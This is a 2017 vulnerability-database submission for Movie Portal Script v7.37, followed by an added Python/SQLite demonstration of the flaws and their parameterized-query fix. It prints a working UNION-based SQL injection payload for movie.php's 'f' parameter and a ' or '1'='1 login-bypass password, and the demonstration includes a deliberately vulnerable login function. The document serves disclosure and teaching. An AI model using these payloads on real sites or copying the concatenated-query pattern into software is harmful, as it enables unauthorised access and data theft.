| Title | Movie Portal Script v7.37 – Multiple Vulnerabilities |
|---|
| Description | Introduction
Exploit Title: Movie Portal Script v7.37 – Multiple Vulnerabilities
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/b2b-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Movie Portal Script v7.37 is undoubtedly the finest movie portal.
Vulnerabilities:
------------------------------------------------
SQL Injection
URL : http://localhost/movie-portal-script/movie.php?f=10[payload]
Parameter: f (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 34 columns
Payload: f=-2245 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787a71,0x644b626f666d766b5551474756446f6e596d57784165697044776879524c7264714164476e624e55,0x716a6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MmOv
------------------------------------------------
Authentication Bypass
http://localhost/movie-portal-script/login.php
username : anyusername
password : ' or '1'='1
------------------------------------------------ |
|---|
| User | KAAN KAMIS (UID 213) |
|---|
| Submitted | 2017-01-30 13:27 (9 years ago) |
|---|
| Moderated | 2017-01-30 21:56 (8 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 96286 [Movie Portal Script 7.37 movie.php f SQL injection] |
|---|
| Points | 17 |
|---|
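
The two findings in the submission above share one root cause: request values are spliced into SQL text. The following is an added example, not code from the report or from the vendor, that models both query shapes in Python with an in-memory SQLite database and shows the parameterized fix; the schema, table names and function names are assumptions made for illustration.

```python
import sqlite3

# Constructed schema and rows; table/column names are assumptions, not the vendor's.
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE users(username TEXT, password TEXT);
CREATE TABLE movies(id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO users VALUES ('admin', 'constructed-password');
INSERT INTO movies VALUES (10, 'Constructed Movie');
""")

def login_vulnerable(username, password):
    # Input is concatenated into the SQL text, so a quote in the value
    # changes the structure of the query itself.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_hardened(username, password):
    # Placeholders keep both values as data; they are never parsed as SQL.
    # (A full fix would also compare against a stored password hash.)
    row = db.execute("SELECT 1 FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row is not None

def movie_hardened(f):
    # `f` is a numeric id: accept only a short run of ASCII digits, then bind it.
    if not (isinstance(f, str) and f.isascii() and f.isdigit() and len(f) <= 9):
        return None
    row = db.execute("SELECT title FROM movies WHERE id = ?", (int(f),)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    reported_password = "' or '1'='1"   # password value from the report above
    print(login_vulnerable("anyusername", reported_password))
    print(login_hardened("anyusername", reported_password))
    print(login_hardened("admin", "constructed-password"))
    print(movie_hardened("10"), movie_hardened("-2245 UNION ALL SELECT NULL"))
```

In the PHP application itself the equivalent change is prepared statements (PDO or mysqli) for every query that takes request input, plus an integer cast or validation on `f`.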